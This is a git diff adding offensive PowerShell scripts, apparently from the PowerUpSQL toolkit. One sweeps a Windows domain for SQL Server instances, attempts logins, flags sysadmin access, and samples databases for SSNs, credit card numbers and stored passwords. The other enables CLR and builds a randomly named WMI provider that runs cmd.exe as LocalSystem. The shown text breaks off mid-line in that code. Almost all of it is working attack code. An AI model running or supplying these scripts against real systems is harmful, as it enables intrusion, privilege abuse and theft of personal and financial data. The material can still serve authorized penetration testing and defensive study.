Write-Output " | o Query the domain controller via LDAP for SQL Server instances|" + Write-Output " | o Filter for instances that respond to UDP scans |" + Write-Output " | |" + Write-Output " | Access Discovery |" + Write-Output " | o Filter for instances that can be logged into |" + Write-Output " | o Filter for instances that provide sysadmin access |" + Write-Output " | o Identify potentially excessive role members (sysadmin) |" + Write-Output " | o Identify shared SQL Server service accounts |" + Write-Output " | o Summarize versions that could be logged into |" + Write-Output " | |" + Write-Output " | Data Target Discovery: Database Targets |" + Write-Output " | o Filter based on database name |" + Write-Output " | o Filter based on database encryption |" + Write-Output " | |" + Write-Output " | Data Target Discovery: Sensitive Data |" + Write-Output " | o Social security numbers via column name |" + Write-Output " | o Credit card numbers via column name |" + Write-Output " | |" + Write-Output " | Data Target Discovery: Passwords |" + Write-Output " | o Passwords via column names |" + Write-Output " | o Passwords in agent jobs (sysadmin) |" + Write-Output " | o Passwords in stored procedures (sysadmin) |" + Write-Output " | |" + Write-Output " ----------------------------------------------------------------" + Write-Output " | Note: This can take hours to run in large environments. |" + Write-Output " ----------------------------------------------------------------" + Write-Output " [*] Results will be written to $OutputDirectory" + + # Verify PowerUpSQL was loaded + $CheckForPowerUpSQL = Test-Path Function:\Get-SQLAuditDatabaseSpec + if($CheckForPowerUpSQL -eq $false) + { + Write-Output " [-] This function requires PowerUpSQL: www.powerupsql.com" + Write-Output " [!] Aborting execution." + break + } + + # Verify an output direcotry has been provided + if(-not $OutputDirectory) + { + Write-Output " [-] -OutputDirectory parameter was not provided." + Write-Output " [!] Aborting execution." + break + } + + # Get start time + $StartTime = Get-Date + Write-Output " [*] Start time: $StartTime" + $StopWatch = [system.diagnostics.stopwatch]::StartNew() + + # Get domain controller + + # Set target domain and domain + Write-Output " [*] Verifying connectivity to the domain controller" + if(-not $DomainController){ + + # If no dc is provided then use environmental variables + $DCHostname = $env:LOGONSERVER -replace("\\","") + $TargetDomain = $env:USERDNSDOMAIN + }else{ + $DCRecord = Get-domainobject -LdapFilter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" -DomainController $DomainController -Username $username -Password $Password | select -first 1 | select properties -expand properties -ErrorAction SilentlyContinue + [string]$DCHostname = $DCRecord.dnshostname + [string]$DCCn = $DCRecord.cn + [string]$TargetDomain = $DCHostname -replace ("$DCCn\.","") + } + + if($DCHostname) + { + Write-Output " [*] - Targeting domain $TargetDomain" + Write-Output " [*] - Confirmed connection to domain controller $DCHostname" + }else{ + Write-Output " [*] - There appears to have been an error connecting to the domain controller." + Write-Output " [*] - Aborting." + break + } + } + + Process + { + + # ------------------------------------------ + # Instance Discovery + # ------------------------------------------ + + Write-Output " [*] -------------------------------------------------------------" + Write-Output " [*] INSTANCE DISCOVERY" + Write-Output " [*] -------------------------------------------------------------" + + # Get SQL Server instances + if($CheckMgmt){ + Write-Output " [*] Querying LDAP for SQL Server SPNs (mssql* and MSServerClusterMgmtAPI)." + Write-Output " [*] - WARNING: You have chosen to target MSServerClusterMgmtAPI" + Write-Output " [*] It will yield more results, but will be much slower." + $AllInstances = Get-SQLInstanceDomain -CheckMgmt + }else{ + Write-Output " [*] Querying LDAP for SQL Server SPNs (mssql*)." + $AllInstances = Get-SQLInstanceDomain + } + + $AllInstancesCount = $AllInstances.count + $AllComputers = $AllInstances | Select ComputerName -Unique + $AllComputersCount = $AllComputers.count + Write-Output " [*] - $AllInstancesCount SQL Server SPNs were found across $AllComputersCount computers." + + # Save list of SQL Server instances to a file + write-output " [*] - Writing list of SQL Server SPNs to $OutputDirectory\$TargetDomain-SQL-Server-Instance-SPNs.csv" + $AllInstances | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-All.csv" + + # Perform UDP scanning of identified SQL Server instances on udp port 1434 + write-output " [*] Performing UDP scanning $AllComputersCount computers." + $UDPInstances = $AllComputers | Where-Object ComputerName -notlike "" | Get-SQLInstanceScanUDPThreaded -Threads 100 + $UDPInstancesCount = $UDPInstances.count + Write-Output " [*] - $UDPInstancesCount instances responded." + $UDPInstances | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-UDPResponse.csv" + + # ------------------------------------------ + # Access Discovery + # ------------------------------------------ + + Write-Output " [*] -------------------------------------------------------------" + Write-Output " [*] ACCESS DISCOVERY" + Write-Output " [*] -------------------------------------------------------------" + + # Check if targeting all or just those that responded to UDP + if($CheckAll){ + + # Attempt to log into instances that found via SPNs + Write-Output " [*] Attempting to log into $AllInstancesCount instances found via SPN query." + $LoginAccess = $AllInstances | Get-SQLServerInfoThreaded -Threads 100 + $LoginAccessCount = $LoginAccess.count + Write-Output " [*] - $LoginAccessCount could be logged into." + $LoginAccess | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-LoginAccess.csv" + + }else{ + + # Attempt to log into instances that responded to UDP + Write-Output " [*] Attempting to log into $UDPInstancesCount instances that responded to UDP scan." + $LoginAccess = $UDPInstances | Get-SQLServerInfoThreaded -Threads 100 + $LoginAccessCount = $LoginAccess.count + Write-Output " [*] - $LoginAccessCount could be logged into." + $LoginAccess | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-LoginAccess.csv" + } + + # Filter for instances with sysadmin privileges + Write-Output " [*] Listing sysadmin access." + $LoginAccessSysadmin = $LoginAccess | Where-Object IsSysadmin -like "Yes" + $LoginAccessSysadminCount = $LoginAccessSysadmin.count + Write-Output " [*] - $LoginAccessSysadminCount SQL Server instances provided sysadmin privileges." + $LoginAccessSysadmin | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-LoginAccess-Sysadmin.csv" + + # Attempt to obtain a list of role members from SQL Server instance (requrie sysadmin) + Write-Output " [*] Attempting to grab role members from $LoginAccessCount instances." + Write-Output " [*] - This usually requires special privileges" + $RoleMembers = $LoginAccess | Get-SQLServerRoleMember + $RoleMembersCount = $RoleMembers.count + Write-Output " [*] - $RoleMembersCount role members were found." + $RoleMembers | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-RoleMembers.csv" + + # Filter for common explicit role assignments for Everyone, Builtin\Users, Authenticated Users, and Domain Users + Write-Output " [*] Identifying excessive role memberships." + $ExcessiveRoleMemberships = $RoleMembers | + ForEach-Object{ + + # Filter for broad groups + if (($_.PrincipalName -eq "Everyone") -or ($_.PrincipalName -eq "BUILTIN\Users") -or ($_.PrincipalName -eq "Authenticated Users") -or ($_.PrincipalName -like "*Domain Users") ) + { + $_ + } + } + $ExcessiveRoleMembershipsCount = $ExcessiveRoleMemberships.count + Write-Output " [*] - $ExcessiveRoleMembershipsCount were found." + $ExcessiveRoleMemberships | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-RoleMembers-Excessive.csv" + + # Create a list of share service accounts from the instance information + Write-Output " [*] Identifying shared SQL Server service accounts." + $SharedAccounts = $AllInstances | Group-Object DomainAccount | Sort-Object Count -Descending | Where Count -GT 4 | Select Count, Name + $SharedAccountsCount = $SharedAccounts.count + Write-Output " [*] - $SharedAccountsCount shared accounts were found." + $SharedAccounts | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-SharedAccounts.csv" + + # Create a summary of the affected SQL Server versions + Write-Output " [*] Creating a list of accessible SQL Server instance versions." + $SQLServerVersions = $LoginAccess | Group-Object SQLServerEdition | Sort-Object Count -Descending | Select Count, Name + $SQLServerVersionsCount = $SQLServerVersions.count + Write-Output " [*] - $SQLServerVersionsCount versions were found that could be logged into." + $SQLServerVersions | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Instances-VersionSummary.csv" + + # ------------------------------------------ + # Data Discovery: Databse Targets + # ------------------------------------------ + + Write-Output " [*] -------------------------------------------------------------" + Write-Output " [*] DATABASE TARGET DISCOVERY" + Write-Output " [*] -------------------------------------------------------------" + + # Get a list of all accessible non-default databases from SQL Server instances + Write-Output " [*] Querying for all non-default accessible databases." + $Databases = $LoginAccess | Get-SQLDatabaseThreaded -NoDefaults -HasAccess + $DatabasesCount = $Databases.count + Write-Output " [*] - $DatabasesCount accessible non-default databases were found." + $Databases | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases.csv" + + # Filter for potential high value databases if transparent encryption is used + Write-Output " [*] Filtering for databases using transparent encryption." + $DatabasesEnc = $Databases | Where-Object {$_.is_encrypted –eq “TRUE”} + $DatabasesEncCount = $DatabasesEnc.count + Write-Output " [*] - $DatabasesEncCount databases were found using encryption." + $DatabasesEnc | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases-Encrypted.csv" + + # Filter for potential high value databases based on keywords + Write-Output " [*] Filtering for databases with names that contain ACH." + $DatabasesACH = $Databases | Where-Object {$_.DatabaseName –like “*ACH*”} + $DatabasesACHCount = $DatabasesACH.count + Write-Output " [*] - $DatabasesACHCount database names contain ACH." + $DatabasesACH | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases-ach.csv" + + Write-Output " [*] Filtering for databases with names that contain finance." + $DatabasesFinance = $Databases | Where-Object {$_.DatabaseName –like “*finance*”} + $DatabasesFinanceCount = $DatabasesFinance.count + Write-Output " [*] - $DatabasesFinanceCount database names contain finance." + $DatabasesFinance | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases-finance.csv" + + Write-Output " [*] Filtering for databases with names that contain pci." + $DatabasesPCI = $Databases | Where-Object {$_.DatabaseName –like “*pci*”} + $DatabasesPCICount = $DatabasesPCI.count + Write-Output " [*] - $DatabasesPCICount database names contain pci." + $DatabasesPCI | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases-pci.csv" + + Write-Output " [*] Filtering for databases with names that contain chd." + $DatabasesCHD = $Databases | Where-Object {$_.DatabaseName –like “*chd*”} + $DatabasesCHDCount = $DatabasesCHD.count + Write-Output " [*] - $DatabasesCHDCount database names contain chd." + $DatabasesCHD | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases-chd.csv" + + Write-Output " [*] Filtering for databases with names that contain enclave." + $DatabasesEnclave = $Databases | Where-Object {$_.DatabaseName –like “*enclave*”} + $DatabasesEnclaveCount = $DatabasesEnclave.count + Write-Output " [*] - $DatabasesEnclaveCount database names contain enclave." + $DatabasesEnclave | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases-enclave.csv" + + Write-Output " [*] Filtering for databases with names that contain pos." + $DatabasesPOS = $Databases | Where-Object {$_.DatabaseName –like “*pos*”} + $DatabasesPOSCount = $DatabasesPOS.count + Write-Output " [*] - $DatabasesPOSCount database names contain pos." + $DatabasesPOS | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Databases-pos.csv" + + # ------------------------------------------ + # Data Discovery: Sensitive Data Targets + # ------------------------------------------ + + Write-Output " [*] -------------------------------------------------------------" + Write-Output " [*] SENSITIVE DATA TARGET DISCOVERY" + Write-Output " [*] -------------------------------------------------------------" + + # Target Social security numbers via column name + Write-Output " [*] Search accessible non-default databases for table names containing SSN." + $SSNNumbers = $LoginAccess | Get-SQLColumnSampleDataThreaded -SampleSize 2 -NoDefaults -Threads 20 -Keywords "ssn" + $SSNNumbersCount = $SSNNumbers.count + Write-Output " [*] - $SSNNumbersCount table columns found containing SSN." + $SSNNumbers | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Data-ssn.csv" + + # Target credit numbers via column name + Write-Output " [*] Search accessible non-default databases for table names containing CARD." + $ccCards = $LoginAccess | Get-SQLColumnSampleDataThreaded -SampleSize 2 -NoDefaults -ValidateCC -Threads 20 -Keywords "card" + $ccCardsCount = $ccCards.count + Write-Output " [*] - $ccCardsCount table columns found containing CARD." + $ccCards | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Data-card.csv" + + Write-Output " [*] Search accessible non-default databases for table names containing CREDIT." + $ccCredit = $LoginAccess | Get-SQLColumnSampleDataThreaded -SampleSize 2 -NoDefaults -ValidateCC -Threads 20 -Keywords "credit" + $ccCreditCount = $ccCredit.count + Write-Output " [*] - $ccCreditCount table columns found containing CREDIT." + $ccCredit | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Data-credit.csv" + + # ------------------------------------------ + # Data Discovery: Password Targets + # ------------------------------------------ + + Write-Output " [*] -------------------------------------------------------------" + Write-Output " [*] PASSWORD TARGET DISCOVERY" + Write-Output " [*] -------------------------------------------------------------" + + # Target passwords based on column names + Write-Output " [*] Search accessible non-default databases for table names containing PASSWORD." + $ColumnPasswords = $LoginAccess | Get-SQLColumnSampleDataThreaded -SampleSize 2 -NoDefaults -Threads 20 -Keywords "password" + $ColumnPasswordsCount = $ColumnPasswords.count + Write-Output " [*] - $ColumnPasswordsCount table columns found containing PASSWORD." + $ColumnPasswords | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Passswords-ColumnName.csv" + + # Target passwords in agent jobs (requires privileges) + Write-Output " [*] Search accessible non-default databases for agent source code containing PASSWORD." + $AgentPasswords = $LoginAccess | Get-SQLAgentJob -Keyword "password" + $AgentPasswordsCount = $AgentPasswords.count + Write-Output " [*] - $AgentPasswordsCount agent jobs containing PASSWORD." + $AgentPasswords | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Passswords-AgentJobs.csv" + + # Target passwords in stored procedures (requires privileges) + Write-Output " [*] Search accessible non-default databases for stored procedure source code containing PASSWORD." + $SpPasswords = $LoginAccess | Get-SQLStoredProcedure -Keyword "password" + $SpPasswordsCount = $SpPasswords.count + Write-Output " [*] - $SpPasswordsCount stored procedures containing PASSWORD." + $SpPasswords | Export-Csv -NoTypeInformation "$OutputDirectory\$TargetDomain-SQLServer-Passswords-Procedures.csv" + } + + End + { + # Get run time + $EndTime = Get-Date + $StopWatch.Stop() + $RunTime = $StopWatch | Select-Object Elapsed -ExpandProperty Elapsed + + # ------------------------------------------ + # Console Report + # ------------------------------------------ + + # Generate summary console output + Write-Output " " + Write-Output " ----------------------------------------------------------------" + Write-Output " SQL SERVER HUNT SUMMARY REPORT " + Write-Output " ----------------------------------------------------------------" + Write-Output " Scan Summary " + Write-Output " ----------------------------------------------------------------" + Write-Output " o Domain : $TargetDomain" + Write-Output " o Start Time : $StartTime" + Write-Output " o Stop Time : $EndTime" + Write-Output " o Run Time : $RunTime" + Write-Output " " + Write-Output " ----------------------------------------------------------------" + Write-Output " Instance Summary " + Write-Output " ----------------------------------------------------------------" + Write-Output " o $AllInstancesCount SQL Server instances found via SPN LDAP query." + Write-Output " o $UDPInstancesCount SQL Server instances responded to port 1434 UDP requests." + Write-Output " " + Write-Output " ----------------------------------------------------------------" + Write-Output " Access Summary " + Write-Output " ----------------------------------------------------------------" + Write-Output " " + Write-Output " Access:" + Write-Output " o $LoginAccessCount SQL Server instances could be logged into." + Write-Output " o $LoginAccessSysadminCount SQL Server instances provided sysadmin access." + Write-Output " o $RoleMembersCount SQL Server role members were enumerated. *requires privileges" + Write-Output " o $ExcessiveRoleMembershipsCount excessive role assignments were identified." + Write-Output " o $SharedAccountsCount Shared SQL Server service accounts found." + Write-Output " " + Write-Output " Below are the top 5:" + + # Display top 5 most common service accounts + $SqlServiceAccountTop5 = $SharedAccounts | Select-Object count,name -First 5 + $SqlServiceAccountTop5 | + Foreach{ + + $CurrentCount = $_.count + $CurrentName = $_.name + Write-Output " o $CurrentCount $CurrentName" + } + + Write-Output " " + Write-Output " Below is a summary of the versions for the accessible instances:" + + # Display all SQL Server instance version counts + $LoginAccess | Group-Object SQLServerEdition | Sort-Object count -Descending | Select-Object count,name | + Foreach{ + + $CurrentCount = $_.count + $CurrentName = $_.name + Write-Output " o $CurrentCount $CurrentName" + } + + Write-Output " " + Write-Output " ----------------------------------------------------------------" + Write-Output " Database Summary " + Write-Output " ----------------------------------------------------------------" + Write-Output " o $DatabasesCount accessible non-default databases were found." + Write-Output " o $DatabasesEncCount databases were found configured with transparent encryption." + Write-Output " o $DatabasesACHCount database names contain ACH." + Write-Output " o $DatabasesFinanceCount database names contain finance." + Write-Output " o $DatabasesCHDCount database names contain chd." + Write-Output " o $DatabasesEnclaveCount database names contain enclave." + Write-Output " o $DatabasesPOSCount database names contain pos." + Write-Output " " + Write-Output " ----------------------------------------------------------------" + Write-Output " Sensitive Data Access Summary " + Write-Output " ----------------------------------------------------------------" + Write-Output " o $SSNNumbersCount sample rows were found for columns containing SSN." + Write-Output " o $ccCreditCount sample rows were found for columns containing CREDIT." + Write-Output " o $ccCardsCount sample rows were found for columns containing CARD." + Write-Output " " + Write-Output " ----------------------------------------------------------------" + Write-Output " Password Access Summary " + Write-Output " ----------------------------------------------------------------" + Write-Output " o $ColumnPasswordsCount sample rows were found for columns containing PASSWRORD." + Write-Output " o $AgentPasswordsCount agent jobs potentially contain passwords. *requires sysadmin" + Write-Output " o $SpPasswordsCount stored procedures potentially contain passwords. *requires sysadmin" + Write-Output " " + Write-Output " ----------------------------------------------------------------" + + # ------------------------------------------ + # HTML Report + # ------------------------------------------ + + $HTMLReport1 = @" + + + + +

SQL SERVER HUNT SUMMARY REPORT

+ Domain:$TargetDomain
+ +

Scan Summary

+
    +
  • Start Time: $StartTime
  • +
  • End Time: $EndTime
  • +
  • Run Time: $RunTime
  • +
+ +

Instance Summary

+ +
    +
  • $AllInstancesCount SQL Server instances found via SPN LDAP query.
  • +
  • $UDPInstancesCount SQL Server instances responded to port 1434 UDP requests.
  • +
+ +

Access Summary

+ +
    +
  • $LoginAccessCount SQL Server instances could be logged into.
  • +
  • $LoginAccessSysadminCount SQL Server instances provided sysadmin access.
  • +
  • $RoleMembersCount SQL Server role members were enumerated. *Requires privileges
  • +
  • $ExcessiveRoleMembershipsCount excessive role assignments were identified.
  • +
  • + $SharedAccountsCount Shared SQL Server service accounts found.
    + Below are the top 5: +
      +"@ + + # Display top 5 most common service accounts + $SqlServiceAccountTop5 = $SharedAccounts | Select-Object count,name -First 5 + $HTMLReport2 = $SqlServiceAccountTop5 | + Foreach{ + + $CurrentCount = $_.count + $CurrentName = $_.name + Write-Output "
    • $CurrentCount $CurrentName
    • " + } + + $HTMLReport3 = @" +
    +
  • +
  • + Below is a summary of the versions for the accessible instances: +
      +"@ + # Display all SQL Server instance version counts + $HTMLReport4 = $LoginAccess | Group-Object SQLServerEdition | Sort-Object count -Descending | Select-Object count,name | + Foreach{ + + $CurrentCount = $_.count + $CurrentName = $_.name + Write-Output "
    • $CurrentCount $CurrentName
    • " + } + + $HTMLReport5 = @" +
    +
  • +
+ +

Database Summary

+ +
    +
  • $DatabasesCount accessible non-default databases were found.
  • +
  • $DatabasesEncCount databases were found configured with transparent encryption.
  • +
  • $DatabasesACHCount database names contain ACH.
  • +
  • $DatabasesFinanceCount database names contain FINANCE
  • +
  • $DatabasesCHDCount database names contain CHD.
  • +
  • $DatabasesEnclaveCount database names contain ENCLAVE.
  • +
  • $DatabasesPOSCount database names contain POS
  • +
+ +

Sensitive Data Access Summary

+ +
    +
  • $SSNNumbersCount sample rows were found for columns containing SSN.
  • +
  • $ccCreditCount sample rows were found for columns containing CREDIT.
  • +
  • $ccCardsCount sample rows were found for columns containing CARD.
  • +
+ +

Password Access Summary

+ +
    +
  • $ColumnPasswordsCount sample rows were found for columns containing PASSWORD.
  • +
  • $AgentPasswordsCount agent jobs potentially contain passwords. *Privileges required
  • +
  • $SpPasswordsCount stored procedures potentially contain passwords. *Privileges requried
  • +
+ + +"@ + $HTMLReport = $HTMLReport1 + $HTMLReport2 + $HTMLReport3 + $HTMLReport4 + $HTMLReport5 + Write-Output " [*] Saving results to $OutputDirectory\$TargetDomain-Share-Inventory-Summary-Report.html" + $HTMLReport | Out-File "$OutputDirectory\$TargetDomain-SQLServer-Summary-Report.html" + } +} diff --git a/scripts/pending/Invoke-SQLOSCmdCLRWMIProvider.ps1 b/scripts/pending/Invoke-SQLOSCmdCLRWMIProvider.ps1 new file mode 100644 index 0000000..b62c2ee --- /dev/null +++ b/scripts/pending/Invoke-SQLOSCmdCLRWMIProvider.ps1 @@ -0,0 +1,614 @@ +# todo +<# +Note: dependant on PowerUpSQL. +- have script accept command or source script as string + --- have that get bake into the wmi provider method + --- update the wmi method to execute the provided string as a script block + --- mod the clr to return the output of the wmi command +- roll into clone of the invoke-sqloscmdclr function so it can scale +- remove wmi cs and dll on client +- remove sql dll cs and dll on client +- deregister sp on sql server +- deregister assembly on sql server +- deregister wmi and remove .dll from sql server +- dynamically find the installutil.exe, it is currently hardcoded +- update variables to make more sense +- work through .net version issues. +#> + +# ---------------------------------- +# Invoke-SQLOSCmdCLRWMIProvider +# ---------------------------------- +# Author: Scott Sutherland and Alexand Leary +Function Invoke-SQLOSCmdCLRWMIProvider +{ + <# + .SYNOPSIS + This registers a CLR assembly, that registers a custom WMI provider, + then the clr assembly will run the custom method. The method accept a string + that is executed as a runspace script block. + Supports threading, raw output, and table output. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER Command + Operating command to be executed on the SQL Server. + .PARAMETER RawResults + Just show the raw results without the computer or instance name. + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdCLR -Verbose -Command "whoami" +#> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'OS command to be executed.')] + [String]$Command, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads.')] + [int]$Threads = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose, + + [Parameter(Mandatory = $false, + HelpMessage = 'Just show the raw results without the computer or instance name.')] + [switch]$RawResults + ) + + Begin + { + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('CommandResults') + + + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable + + # set instance to local host by default + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Ensure provided instance is processed + if($Instance) + { + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } + } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance + } + + Process + { + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } + + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + $Instance = $_.Instance + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut + } + + # Attempt connection + try + { + # Open connection + $Connection.Open() + + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + + # Switch to track CLR status + $DisableShowAdvancedOptions = 0 + $DisableCLR = 0 + + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + # Check if CLR is enabled + if($IsSysadmin -eq 'Yes') + { + Write-Verbose -Message "$Instance : You are a sysadmin." + $IsCLREnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + } + else + { + Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') + return + } + + # Enable show advanced options if needed + if ($IsShowAdvancedEnabled -eq 1) + { + Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." + } + else + { + Write-Verbose -Message "$Instance : Show Advanced Options is disabled." + $DisableShowAdvancedOptions = 1 + + # Try to enable Show Advanced Options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsShowAdvancedEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Show Advanced Options." + } + else + { + Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') + return + } + } + + # Enable CLR if needed + if ($IsCLREnabled -eq 1) + { + Write-Verbose -Message "$Instance : CLR is already enabled." + } + else + { + Write-Verbose -Message "$Instance : CLR is disabled." + $DisableCLR = 1 + + # Try to enable CLR + Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsCLREnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "CLR Enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsCLREnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled CLR." + } + else + { + Write-Verbose -Message "$Instance : Enabling CLR failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable CLR.') + + return + } + } + + # ----------------------------------- + # Setup and Compile WMI Provider DLL + # ----------------------------------- + + # Status user + Write-Verbose -Message "$Instance : Generating WMI provider C# Code" + + # Create random WMI name space + $WMINameSpaceLen = (5..10 | Get-Random -count 1 ) + $WMINameSpace = (-join ((65..90) + (97..122) | Get-Random -Count $WMINameSpaceLen | % {[char]$_})) + Write-Verbose -Message "$Instance : - WMI Provider name space: $WMINameSpace" + + # Create random WMI class name + $WMIClassLen = (5..10 | Get-Random -count 1 ) + $WMIClass = (-join ((65..90) + (97..122) | Get-Random -Count $WMIClassLen | % {[char]$_})) + Write-Verbose -Message "$Instance : - WMI Provider class: $WMIClass" + + # Create random WMI method name + $WMIMethodLen = (5..10 | Get-Random -count 1 ) + $WMIMethod = (-join ((65..90) + (97..122) | Get-Random -Count $WMIMethodLen | % {[char]$_})) + Write-Verbose -Message "$Instance : - WMI Provider Method: $WMIMethod " + + # Create random WMI provider file name + $WmiFileNameLen = (5..10 | Get-Random -count 1 ) + $WmiFileName = (-join ((65..90) + (97..122) | Get-Random -Count $WmiFileNameLen | % {[char]$_})) + Write-Verbose -Message "$Instance : - WMI Provider file name: $WmiFileName.dll" + + # Define WMI provider code + $WMICS = " + using System; + using System.Collections; + using System.Management; + using System.Management.Instrumentation; + using System.Runtime.InteropServices; + using System.Configuration.Install; + + [assembly: WmiConfiguration(@`"root\cimv2`", HostingModel = ManagementHostingModel.LocalSystem)] + namespace $WMINameSpace + { + [System.ComponentModel.RunInstaller(true)] + public class MyInstall : DefaultManagementInstaller + { + //private static string fileName = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName; + + public override void Install(IDictionary stateSaver) + { + try + { + new System.EnterpriseServices.Internal.Publish().GacInstall(`"$WmiFileName.dll`"); + base.Install(stateSaver); + RegistrationServices registrationServices = new RegistrationServices(); + } + catch { } + } + + public override void Uninstall(IDictionary savedState) + { + + try + { + new System.EnterpriseServices.Internal.Publish().GacRemove(`"$WmiFileName.dll`"); + ManagementClass managementClass = new ManagementClass(@`"root\cimv2:Win32_$WMIClass`"); + managementClass.Delete(); + } + catch { } + + try + { + base.Uninstall(savedState); + } + catch { } + } + } + + [ManagementEntity(Name = `"Win32_$WMIClass`")] + public class $WMIClass + { + [ManagementTask] + public static string $WMIMethod(string command, string parameters) + { + + // Write a file to c:\temp\doit.txt using wmi + object[] theProcessToRun = { `"c:\\windows\\system32\\cmd.exe /C \`"echo testing123$WMIMethod > c:\\temp\\doit.txt \`"`" }; + ManagementClass 